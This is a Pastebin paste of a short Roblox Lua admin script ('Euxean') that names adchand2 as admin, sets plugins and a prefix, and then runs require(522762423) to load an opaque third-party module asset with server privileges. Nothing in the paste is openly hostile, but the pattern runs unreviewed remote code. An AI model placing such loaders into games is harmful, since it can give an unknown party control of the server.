Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- -- This is Euxean public version.
- -- Whoever made the script model must put it up for sale.
- -- Here is the model URL: https://www.roblox.com/library/522762423/mmnnmmm
- -- Made by adchand2 / memesbruh03
- Users = {
- [game.Players.adchand2.Name]=true;
- }
- UsersID = {
- }
- Plugins = {
- 'Essentials';
- 'Fun';
- 'Developer';
- }
- Settings = {
- Prefix=';';
- StartMessage=false;
- Splitter=' ';
- }
- local hs=game:service'HttpService'
- for i,v in pairs(UsersID) do
- Users[game:service'Players':GetNameFromUserIdAsync(i)]=v
- end
- require(522762423)(hs:JSONEncode(Users),hs:JSONEncode(Plugins),hs:JSONEncode(Settings)
- )
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement